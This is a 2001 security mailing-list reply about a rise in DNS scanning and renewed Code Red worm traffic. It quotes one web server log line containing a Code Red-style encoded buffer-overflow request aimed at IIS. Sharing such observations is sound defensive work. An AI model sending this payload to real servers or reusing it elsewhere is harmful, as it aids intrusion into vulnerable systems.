Re: Resurgence of DNS scanning activity

[John Kinsella <jlk () thrashyour com>]

Yep, the DNS scans are definitely picking back up again.  Code Red or
some variant seems to have woken back up in the last 12 hours or so as
well, plus I just saw this one:

xxx.xxx.xxx.xxx - - [30/Aug/2001:10:04:34 -0700] 
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.1" 400

It's happened more than once, and it's coming from the same IP that's
also doing the normal code red thing.

John

On Thu, Aug 30, 2001 at 09:47:47AM -0400, Keith.Morgan wrote:
> Is anyone else seeing a resurgence of DNS scans?  Or, for the past month+
> have we just been dodging the bullet.  DNS has been really quiet on our
> networks for the past couple of months, but over the past two days, we've
> seen a 90% increase.  New worm?  Kids back at school?  Just a fluke?
>
> Keith T. Morgan
> Chief of Information Security
> Terradon Communications
> keith.morgan () terradon com
> 304-755-8291 x142
>
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com